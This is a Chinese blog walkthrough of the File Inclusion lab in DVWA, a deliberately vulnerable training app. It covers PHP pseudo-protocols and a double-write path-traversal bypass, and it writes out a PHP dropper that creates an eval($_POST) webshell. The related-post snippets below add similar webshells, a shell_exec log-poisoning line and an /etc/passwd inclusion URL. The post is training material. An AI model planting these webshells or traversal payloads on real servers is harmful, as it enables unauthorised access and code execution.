DVWA 文件包含File Inclusion

已于 2024-05-31 14:33:38 修改
阅读量257 收藏 4
点赞数 9
文章标签: 安全 web安全
于 2024-05-18 19:11:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/moonlightsunshin/article/details/139029729
版权

简析文件上传

        开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校检或者校检被绕过就造成了文件包含漏洞。

分类

   本地文件包含

        文件在服务器本地

   远程文件包含

                当php.ini的配置选项allow_url_fopen和allow_url_include为ON,则可能存在远程文件包含漏洞

常见PHP伪协议

1、File://         -- 访问本地文件系统

2、http://         --访问http(s)网址

3、Phar://            --PHP归档

4、Php://          --访问各个输入/输出流

5、Zlib://         --压缩流

6、Data://         --数据

7、Glob://          --查找匹配的文件路径模式

8、ftp://             --访问ftp(s)URLs

9、ssh2://           --Secure Shell 2

10、rar://           --RAR

11、ogg://           --音频流

12、expect://          --处理交互式的流

LOW

        源码分析没有过滤

Medium

        

对http://和../,..\有过滤直接用双写绕过就行

http://dvwa:88/vulnerabilities/fi/?page=....//....//phpinfo.php

        

high

        源码分析对我们传入的参数进行了file限制我们文件路径头必须是file

        

这里可以结合文件上传来利用漏洞

漏洞利用

写一个后门代码

<?PHP
 fputs(fopen('shell.php','w'),'
<?php eval($_POST[1])?>');
echo("ok");
?>

        执行后会写入一个shell.php的后门代码通过前面我们利用报错得到路径

        

moonlightsunshin
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVWA的压缩文件安装包下载
09-30
4. **文件包含漏洞**:在"File Inclusion"环节,你可以看到如何利用错误配置的文件包含功能来读取服务器上的任意文件,甚至执行服务器上的代码。了解如何正确处理文件包含函数可以防止这类攻击。 5. **认证与会话...
DVWA-master.zip
08-22
DVWA的"File Inclusion"部分,你可以学习如何检测和修复这类问题。 5. **命令注入**:当应用程序使用不受信任的输入来构建操作系统命令时,攻击者可能执行任意系统命令。"Command Injection"章节提供了一个实践...
DVWA——文件包含漏洞详细全解(具体操作步骤和多种方式进行漏洞利用)
热门推荐
weixin_46709219的博客
11-07 1万+
文件包含详细:https://www.cnblogs.com/hai-long/p/10326361.html 文件包含基础:https://blog.csdn.net/weixin_34357928/article/details/85077218 谢公子文件包含:https://blog.csdn.net/qq_36119192/article/details/82915884 中国菜刀Apache:https://blog.csdn.net/sunshine1_0/article/details/86
dvwa 文件上传
一个安全研究员
04-20 6110
漏洞介绍 文件上传漏洞可以说是危害很大了,因为可以直接通过此漏洞getshell。漏洞原因简单点说就是由于开发人员或者网站运维人员的一些失误导致用户上传的文件可以被服务器当作脚本(可执行文件)解析执行。但是想要成功利用这个漏洞至少需要满足三个条件: A.有效上传点 B.上传文件能够被解析执行 C.上传的文件能够被访问到 low 由于我是搭建在wamp环境下的,所以我试着上传一个ph...
DVWAFile Upload(文件上传)
RexHa的博客
10-02 2702
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA--FileUpload
weixin_45038413的博客
05-09 456
Low 等级 上传正常图片 https://dvwa.practice.rois.io/vulnerabilities/upload/ + …/…/hackable/uploads/1.jpg =https://dvwa.practice.rois.io/hackable/uploads/1.jpg 上传一句话木马 连接AntSword Medium 等级 上传php文件失败,显示只允...
DVWA——文件包含漏洞(File Inclusion
qq_45927819的博客
10-18 1212
前言: 之前总结了文件上传漏洞的三个等级的测试,到high的时候我们制作的一句话木马图片需要去解析,就会用到文件包含漏洞,那么今天就来学习一下文件包含漏洞和DVWA——File Inclusion测试吧! 什么是文件包含漏洞? 文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做
DVWA包含以下几个主要的安全漏洞类别.rar
最新发布
06-13
5. **文件包含漏洞(File Inclusion)**:这种漏洞允许攻击者通过修改动态文件包含函数的参数,将恶意文件内容注入到应用程序中。在DVWA中,这可能表现为可以更改被包含的文件路径,从而读取服务器上的敏感文件或...
DVWA最新版
03-23
DVWA的"File Inclusion"部分让你了解这类漏洞的危害,学习如何设置严格的文件验证规则以避免此类风险。 命令注入是指攻击者能够注入操作系统命令到应用程序,从而执行恶意操作。在"Command Injection"模块中,你将...
DVWA配置二所需压缩包
11-09
- **vulnerabilities** - 存放各个漏洞模块的目录,如`sql_injection`, `command_injection`, `xss`, `file_inclusion`等。 - **index.php** - 入口文件,负责加载和处理请求。 2. **安装过程** - 在Win10 64位...
DVWA-File Inclusion文件包含
Cwillchris的博客
10-28 2283
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: FileInclusion,意思是文件包含(漏洞),是指当服务器开启 allow_url_include选项时,就可以通过php的某些特性函数(include(), require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。.
远程执行文件包含
weixin_30347335的博客
01-08 277
<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat /var/log/httpd...
dvwa File Inclusion(文件包含) 低中高各个级别介绍及破解过程
weixin_44286136的博客
05-19 964
本地文件包含 http://192.168.0.8/dvwa/vulnerabilities/fi/?page=/etc/passwd 类似 本地文件包含+webshell 1.制作一句话木马 1234.jpg 推荐软件 edjpgcom <?fputs(fopen("shell.php","w"),'<?php eval($_POST[admin]);?>')?> 2.上传图片木马文件 3.执行文件包含 并产生后门 4.通过菜刀连接 ...
DVWAFile Inclusion文件包含
RexHa的博客
10-01 1203
dvwa 文本包含漏洞的解析
DVWA —— File Inclusion 文件包含
YouTheFreedom的博客
05-22 1595
web 程序中引入一段用户能控制的脚本或代码,并让服务器端执行 include() 等函数通过动态变量的方式引入需要包含的文件,用户能够控制该动态变量,实现本地文件包含或者远程文件包含
DVWA攻略-02-File 包含/上传
Xor0ne
07-15 324
文章目录4.File Inclusion原理分析4.1、low源码赏析start4.2、medium4.3、high4.4、Impossiable5.File Upload5.1、low5.2、medium5.3、high5.4、Impossiable 4.File Inclusion 参考文献: 文件包含漏洞 原理分析 File Inclusion文件包含漏洞,目录遍历漏洞在国内外有许多不同的叫法,也可以叫做信息泄露漏洞、非授权文件包含漏洞等。 文件包含分类 LFI:本地文件包含(Local File
DVWA -File Upload-通关教程-完结
刘箫-技术库
04-07 1618
这行代码检查上传文件的类型和大小是否符合要求,并使用 getimagesize() 函数验证上传文件是否为有效的图像文件。但是此时是不能用蚁剑连接的,因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。如果上传文件不是 JPEG 或 PNG 格式,或者文件大小超过 100KB,则输出错误消息,指示上传的文件不符合要求。这段 PHP 代码是一个简单的文件上传处理程序,它接受通过 POST 请求上传的文件,并将其保存到指定的目录中。如果收到了该请求,说明用户尝试上传文件。
DVWA [File Upload] [文件上传漏洞]
weixin_45253622的博客
05-20 697
目录 Low Medium High Impossible 漏洞防御 Low 源码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //上传文件的路径 $target_path .= basename( $_FILES[
dvwa文件包含file not found
02-25
文件包含File Inclusion)是其中一种常见的漏洞类型之一,当应用程序在加载文件时未正确验证用户提供的输入,攻击者可以通过构造恶意请求来包含任意文件,导致文件未找到(file not found)的错误。 在DVWA中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值